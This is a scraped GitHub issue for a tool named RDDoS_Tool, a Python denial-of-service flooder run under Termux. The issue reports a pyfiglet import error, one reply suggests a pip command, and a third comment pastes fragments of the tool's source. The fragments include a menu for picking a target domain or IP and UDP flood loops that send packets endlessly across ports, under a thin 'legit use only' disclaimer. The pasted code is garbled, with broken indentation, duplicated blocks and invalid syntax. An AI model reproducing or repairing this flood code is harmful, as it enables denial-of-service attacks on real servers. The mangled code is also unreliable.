Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Traceback (most recent call last): File "/data/data/com.termux/files/home/RDDoS_Tool/RDDoS_Tool.py", line 15, in <module> import pyfiglet File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/pyfiglet/__init__.py", line 8, in <module> import pkg_resources ModuleNotFoundError: No module named 'pkg_resources' #14

Open
gggsiw opened this issue Sep 18, 2024 · 3 comments

Comments

@gggsiw
Copy link

gggsiw commented Sep 18, 2024

Traceback (most recent call last): File "/data/data/com.termux/files/home/RDDoS_Tool/RDDoS_Tool.py", line 15, in import pyfiglet File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/pyfiglet/init.py", line 8, in
import pkg_resources
ModuleNotFoundError: No module named 'pkg_resources'

Please help me

@TnNobody
Copy link

TnNobody commented Oct 6, 2024

Termux use this command
pip download pyfiglet
Maybe this work :)

@kming2011
Copy link

Input.

opt = str(input("\n> "))

Selection.

if opt == '1':
domain = str(input("Domain:"))
ip = socket.gethostbyname(domain)
break

elif opt == '2':
ip = str(input("IP Address: "))
break

elif opt == '3':
print("\n\033[101mEasy. .سهل\033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[0m \033[92m_____\033[0m")
print(" \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m\033[0m \033[92m.-' '-.\033[0m")
print("\033[101mOpen. .افتح\033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[92m.'\033[91m____\033[0m secure\033[92m'.\033[0m")
print(" \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[92m/ \033[91m| _ \\033[0m \033[93m__\033[0m \033[92m\\033[0m")
print("\033[101mSecure. .يؤمن\033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[101m \033[0m \033[92m;\033[0m r \033[91m| |) /\033[0m\033[93m/ o\\033[0m t \033[92m;\033[0m")
print(" \033[92m|\033[0m e \033[91m| _ <\033[0m \033[93m\__/\033[0m e \033[92m|\033[0m")
print("RedDDoS Tool is an open source tool for \033[92m;\033[0m d \033[91m|
| \ \\033[0m \033[93m<|\033[0m a \033[92m;\033[0m")
print("penetration. You can test networks/servers/any \033[92m\ \033[91m\/\033[0m \033[93m<|\033[0m m\033[92m/\033[0m")
print("other devices with it. \033[92m'.\033[0m member \033[93m<|\033[0m \033[92m.'\033[0m")
print(" \033[92m'-._____.-'\033[0m")
print("Author of the program is not responsible for")
print("it's usage, everybody MUST use it ONLY in member-id: 'rst-00000002'")
print("legit cases.")
print("\nFor more information visit project's site.")

goon = input("\n\n\n\n\n\n\nPress Enter to continue.")
os.system(cmd_clear)

elif opt == '4':
exit()

else:
print('\033[91mInvaild Choice!\033[0m')
time.sleep(2)
os.system(cmd_clear)

if (port_bool == "y") or (port_bool == "Y"):
    port_mode = True
    port = int(input("Port: "))
break

else (port_bool == "n") or (port_bool == "N"):
break

else:
print('\033[91mInvaild Choice!\033[0m')
time.sleep(2)

        elif port == 1900:
        port = 1901

    sock.sendto(bytes, (ip, port))
    sent += 1
    port += 1
    print("\033[32;1mSent %s packets to %s through port:%s"%(sent, ip, port))

except:
print('\n\033[31;1mExited\033[0m')

        elif port == 1900:
        port = 1901

    sock.sendto(bytes, (ip, port))
    sent += 1
    port += 1
    print("\033[32;1mSent %s packets to %s through port:%s"%(sent, ip, port))

except:
print('\n\033[31;1mExited\033[0m')

elif port == 65534:
port = 2

elif port == 1900:
port = 1901

try:
while True:
sock.sendto(bytes, (ip, port))
sent += 1
print("\033[32;1mSent %s packets to %s through port:%s"%(sent, ip, port))
except:
print('\n\033[31;1mExited\033[0m')

@gggsiw
Copy link
Author

gggsiw commented Dec 2, 2024 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants